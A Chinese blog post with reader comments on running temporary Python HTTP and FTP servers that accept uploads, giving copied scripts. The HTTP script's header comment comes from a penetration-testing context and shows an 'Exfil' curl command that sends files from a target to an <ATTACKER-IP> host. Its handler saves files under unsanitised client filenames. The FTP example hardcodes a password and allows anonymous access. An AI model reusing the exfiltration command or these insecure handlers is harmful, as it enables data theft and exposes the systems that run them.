=Start=
缘由:
简单整理一下在Linux服务器上用Python快速创建支持上传(下载)功能的FTP/HTTP服务的方法,方便有需要的时候参考和使用。
正文:
参考解答:
有些时候因为测试需要临时搭建一些环境用于问题验证,专门去下载对应的软件然后安装配置还是有点麻烦,所以想着去搜索整理一些简单快速(尽可能利用现有环境资源,不安装或少安装额外的库/软件,不运行未经过人工审计确认过的大段代码/程序,减小中招概率)去搭建测试环境的方法,方便有需要的时候进行使用。
另外就是需要提前说明的就是,这里搭建的HTTP/FTP服务只适用于临时使用,在使用完了之后最好立即退出,避免出现一些意想不到的问题。
考虑到Python在绝大多数的Linux发行版当中都默认安装,所以平时在(跨平台)传输文件的时候就经常会用到Python的SimpleHTTPServer模块,以HTTP方式共享当前文件夹的文件。
$ python -m SimpleHTTPServer 9000
$ python3 -m http.server 9000
对于文件的下载来说默认的SimpleHTTPServer模块就够了,但是通过这种方式启动的HTTP服务仅支持下载不支持上传,所以下面的内容主要是为了实现一个支持上传功能的HTTP服务。原理本身并不复杂,在此基础上也可根据需要进行简单改写以满足特定需求,我只是为了记录一下方便后面参考,所以这里直接放一些验证过可用的简短代码,想要详细的可以看后面的参考链接进一步查看。
-- 搭建HTTP服务,挑了个代码短的方便展现
#!/usr/env python3
########################################################################
#
# Simple HTTP server that supports file upload for moving data around
# between boxen on HTB. Based on a gist by bones7456, but mangled by me
# as I've tried (badly) to port it to Python 3, code golf it, and make
# It a little more robust. I was also able to strip out a lot of the
# code trivially because Python3 SimpleHTTPServer is a thing, and the
# cgi module handles multipart data nicely.
#
# Lifted from: https://gist.github.com/UniIsland/3346170
#
# Important to note that this tool is quick and dirty and is a good way
# to get yourself popped if you're leaving it running out in the real
# world.
#
# Run it on your attack box from the folder that contains your tools.
#
# From the target machine:
# Infil file: curl -O http://<ATTACKER-IP>:44444/<FILENAME>
# Exfil file: curl -F 'file=@<FILENAME>' http://<ATTACKER-IP>:44444/
#
# Multiple file upload supported, just add more -F 'file=@<FILENAME>'
# parameters to the command line.
#
########################################################################
import http.server
import socketserver
import io
import cgi
# Change this to serve on a different port
PORT = 44444
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_POST(self):
r, info = self.deal_post_data()
print(r, info, "by: ", self.client_address)
f = io.BytesIO()
if r:
f.write(b"Success\n")
else:
f.write(b"Failed\n")
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-Length", str(length))
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def deal_post_data(self):
ctype, pdict = cgi.parse_header(self.headers['Content-Type'])
pdict['boundary'] = bytes(pdict['boundary'], "utf-8")
pdict['CONTENT-LENGTH'] = int(self.headers['Content-Length'])
if ctype == 'multipart/form-data':
form = cgi.FieldStorage( fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD':'POST', 'CONTENT_TYPE':self.headers['Content-Type'], })
print (type(form))
try:
if isinstance(form["file"], list):
for record in form["file"]:
open("./%s"%record.filename, "wb").write(record.file.read())
else:
open("./%s"%form["file"].filename, "wb").write(form["file"].file.read())
except IOError:
return (False, "Can't create file to write, do you have permission to write?")
return (True, "Files uploaded")
Handler = CustomHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
-- 搭建FTP服务,需先额外安装pyftpdlib模块
#!/usr/bin/env python
# coding=utf-8
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from pyftpdlib.authorizers import DummyAuthorizer
class MyHandler(FTPHandler):
def on_connect(self):
print ("%s:%s connected" % (self.remote_ip, self.remote_port))
def on_disconnect(self):
# do something when client disconnects
pass
def on_login(self, username):
# do something when user login
pass
def on_logout(self, username):
# do something when user logs out
pass
def on_file_sent(self, file):
# do something when a file has been sent
print(self.username, file)
pass
def on_file_received(self, file):
# do something when a file has been received
print(self.username, file)
pass
def on_incomplete_file_sent(self, file):
# do something when a file is partially sent
print(self.username, file)
pass
def on_incomplete_file_received(self, file):
# remove partially uploaded files
import os
os.remove(file)
def main():
authorizer = DummyAuthorizer()
authorizer.add_user('user', 'userpass123', homedir='.', perm='elradfmwMT')
authorizer.add_anonymous(homedir='/tmp/')
handler = MyHandler
handler.authorizer = authorizer
server = FTPServer(('', 9999), handler)
server.serve_forever()
if __name__ == "__main__":
main()
参考链接:
Simple Python Http Server with Upload – Python3 version (测试OK)
https://gist.github.com/touilleMan/eb02ea40b93e52604938
[x]Python SimpleHTTPServer to receive files (测试OK,页面仅支持浏览,上传需要通过curl等命令进行POST操作)
https://stackoverflow.com/questions/39788591/python-simplehttpserver-to-receive-files
https://gist.github.com/smidgedy/1986e52bb33af829383eb858cb38775c
python simple http server with upload & download (测试OK,页面浏览功能不支持;另外就是因为仅改写了PUT操作的代码,所以仅支持用PUT方法上传文件)
https://gist.github.com/darkr4y/761d7536100d2124f5d0db36d4890109
Receiving files over HTTP with Python
https://floatingoctothorpe.uk/2017/receiving-files-over-http-with-python.html
Python’s http.server extended to include a file upload page (因为要额外安装包,所以暂未测试)
https://pypi.org/project/uploadserver/
https://github.com/Densaugeo/uploadserver
One line ftp server in python
https://stackoverflow.com/questions/4994638/one-line-ftp-server-in-python
https://docs.twistedmatrix.com/en/stable/core/examples/#ftp-examples
[y]Extremely fast and scalable Python FTP server library
https://github.com/giampaolo/pyftpdlib
https://pyftpdlib.readthedocs.io/en/latest/tutorial.html#event-callbacks
Pyftpdlib 使用方法
https://blog.csdn.net/xuq09/article/details/84936853
python-ftp-server (Command line FTP server tool designed for performance and ease of use.)
https://pypi.org/project/python-ftp-server/
=END=
《 “用Python快速搭建支持上传功能的HTTP/FTP服务” 》 有 3 条评论
nodejs快速搭建一个http服务
https://juejin.cn/post/7028461046033547271
`
可以用这个做什么?
1. 快速搭建一个临时的静态http服务 (用于打包之后的前端预览什么的)
2. 做一个临时的代理服务器 (用于临时性解决请求跨域问题)
依赖 http-server 模块
# 全局安装
npm install -g http-server
# 临时搭建一个静态http服务
http-server -a 127.0.0.1 -p 7070
# 临时搭建一个代理服务器(将发送到本地1234端口上的请求转发到proxy选项指定的地址去)
http-server -p 1234 –proxy http://127.0.0.1:8080
`
轻松交付大文件 woc.space 使您可以快速共享文件
没有任何限制(不限速,无需 App)
https://woc.space/
`
woc.space 是什么?
woc.space 是一个数字内容交付、协作、AI 平台,致力于采用更为先进,灵活,智能的方式,提升数字资产交付场景下的所有问题,甚至延伸至数字内容的加工处理和分发。
# 产品特色
* 更好的传输工具:
* 无限制:真正全球,不限速
* 更安全:端到端加密,像素级别分享管理,支持匿名上传
* 更便宜:与其他同类产品相比,“相同权益时,我们更便宜。相同价格时,我们更多权益。”
* 不只是传输工具:
* 基于空间的协作平台:存传一体,根据拥有者的权限设置,实现不同成员之间的协作
* 基于数字资产的AI平台:通过丰富的AI拓展辅助,实现与资产对话
* 基于分享传输的创作者收入平台:赠人玫瑰,手有余香,热爱分享的创作者,理应获得更多的收益
* 基于数字资产分发的微门户:分享传输过程也是宣传过程,交付也是重要的品牌传播节点。
`
LANDrop/LANDrop: 将任何文件拖放到局域网上的任何设备上。
https://github.com/LANDrop/LANDrop
`
跨平台局域网文件传输工具
LANDrop会自动发现同一局域网下运行LANDrop的其他设备,因此你不需要自己输入IP地址。此外,你也不需要像使用其他应用程序那样设置服务器。LANDrop会在后台自动完成所有繁杂的工作。它就像一个跨平台的AirDrop。
`